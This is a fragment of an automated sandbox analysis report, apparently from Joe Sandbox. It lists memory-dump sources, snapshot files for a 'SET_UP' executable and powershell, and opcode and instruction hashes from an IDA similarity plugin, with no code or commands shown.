                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 32694325-0
                                                                                                                                                                                                  • Opcode ID: 1f0a4df808ede824eea7e3e3cd6f089795d77390aedf663ff31a3cb0aa7423a7
                                                                                                                                                                                                  • Instruction ID: 87146c04dc807499cda0621b2d516821516632fde33fe712a187cdffb704bb0c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f0a4df808ede824eea7e3e3cd6f089795d77390aedf663ff31a3cb0aa7423a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6C002318014749ACE522B55FC0484F3FA5EF542603118062BD045203497221C96FFC0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1955978972.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_4b90000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 306d21333b9d3f33805f70348aff33efb729d09b4edd1a928f9d730d9695266a
                                                                                                                                                                                                  • Instruction ID: c0ce0ae5dff720e27d67b2d734f196afef0138e8e8e831944c987eefed2d02b0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 306d21333b9d3f33805f70348aff33efb729d09b4edd1a928f9d730d9695266a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A023B74A042099FDB05CF98D584AADFBF1FF49324F2581A9E805AB361C735ED82CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1957836242.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_75b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d99bf450064bef927f28ff3a6b30caa992f0d1a219b270cdcbe5d6136483eda9
                                                                                                                                                                                                  • Instruction ID: 5d863789dd94f82645a1bd5201c11fffd65e8a3f13255034f788fbf5d922e563
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d99bf450064bef927f28ff3a6b30caa992f0d1a219b270cdcbe5d6136483eda9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D45103B0B10215CBCB349B788915BFFBBA2BB80318F1584A7D9099B295DF31DD4187A1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000004.00000002.1957836242.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_75b0000_powershell.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: